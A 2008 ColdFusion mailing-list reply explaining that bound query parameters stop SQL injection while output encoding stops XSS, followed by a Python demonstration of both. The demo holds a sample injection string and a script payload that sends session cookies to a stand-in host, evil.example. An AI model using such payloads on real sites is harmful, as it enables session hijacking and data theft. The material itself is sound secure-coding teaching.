If you're using CFQUERYPARAM there's nothing to worry about on the database side; the danger is when you output the varchar string to your website without sanitising the string. If that string includes some JavaScript, for example, they could steal your client's session.
Using HTMLEditFormat when displaying such string content makes it safe, as <script> becomes &lt;script&gt;

z

On Mon, Jun 30, 2008 at 2:15 PM, nedlud <[EMAIL PROTECTED]> wrote:
>
> Hi,
>
> I'm a bit concerned about ColdFusion's security vs SQL injection
> attacks. As a rule I use CFQUERYPARAMs for all parameters going into
> a query (I use MySQL as my db, if that makes any difference).
>
> But it seems to me that the cf_sql_varchar type is still a liability
> since you can effectively pass any string into that field. So what's
> to stop people from trying an injection there? Setting the length on
> the string, as the live docs suggest, seems a particularly lame
> defence.
>
> Any comments or suggestions for how I should deal with this?
>
> I've done some googling and keep coming up empty with solutions
> applicable to CF.
>
> Am I really going to have to check all string parameters myself before
> passing them into the db?
>
>

--
Zac Spitzer - http://zacster.blogspot.com (My Blog)
+61 405 847 168
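The two halves of the reply above (a bound cf_sql_varchar parameter is inert no matter what string it carries; the real risk is echoing that string into HTML unencoded) shown as a runnable, added example. This is not code from the thread: it uses Python with an in-memory sqlite3 table standing in for MySQL, bound `?` parameters standing in for `<cfqueryparam cfsqltype="cf_sql_varchar">`, and `html.escape` standing in for HTMLEditFormat. The table, rows, injection string and script payload are all constructed for the demo.

```python
import html
import sqlite3

# Constructed sample inputs (not from the thread): a classic SQL-injection
# string and a stored-XSS payload that exfiltrates the session cookie.
INJECTION_ATTEMPT = "x' OR '1'='1"
XSS_PAYLOAD = ("<script>document.location='http://evil.example/?c='"
               "+document.cookie</script>")


def build_db():
    """In-memory comments table with two benign rows (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE comments (id INTEGER PRIMARY KEY, author TEXT, body TEXT)"
    )
    conn.executemany(
        "INSERT INTO comments (author, body) VALUES (?, ?)",
        [("alice", "hello"), ("bob", "hi there")],
    )
    conn.commit()
    return conn


def find_by_author_unsafe(conn, author):
    """String concatenation: the attacker's quote closes the literal and
    OR '1'='1' makes the WHERE clause true for every row."""
    sql = "SELECT author, body FROM comments WHERE author = '" + author + "'"
    return conn.execute(sql).fetchall()


def find_by_author_param(conn, author):
    """Bound parameter, the equivalent of
    <cfqueryparam value="#author#" cfsqltype="cf_sql_varchar">:
    the whole string, quotes and all, is compared as data, never parsed."""
    return conn.execute(
        "SELECT author, body FROM comments WHERE author = ?", (author,)
    ).fetchall()


def store_comment(conn, author, body):
    """Insert with bound parameters; any string is stored verbatim."""
    conn.execute(
        "INSERT INTO comments (author, body) VALUES (?, ?)", (author, body)
    )
    conn.commit()


def render_unsafe(body):
    """Output without encoding: a stored <script> tag runs in the browser."""
    return "<p>" + body + "</p>"


def render_safe(body):
    """html.escape plays the role of HTMLEditFormat here: & < > " ' become
    entities, so the markup is displayed as text instead of executed."""
    return "<p>" + html.escape(body, quote=True) + "</p>"


def demo():
    """Run both halves of the argument and return the evidence."""
    conn = build_db()
    leaked = find_by_author_unsafe(conn, INJECTION_ATTEMPT)  # every row
    bound = find_by_author_param(conn, INJECTION_ATTEMPT)    # no match
    store_comment(conn, "mallory", XSS_PAYLOAD)
    stored = find_by_author_param(conn, "mallory")[0][1]      # inert in the DB
    return {
        "leaked_rows": leaked,
        "bound_rows": bound,
        "stored": stored,
        "unsafe_html": render_unsafe(stored),
        "safe_html": render_safe(stored),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Two caveats a practitioner would want: the `maxlength` on cfqueryparam is an input-validation limit, not what stops injection; the binding does that, which is why the quoted payload simply matches no row. And HTMLEditFormat encodes for HTML body text; a string dropped into an attribute value, a URL or a JavaScript block needs the encoding for that context instead.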
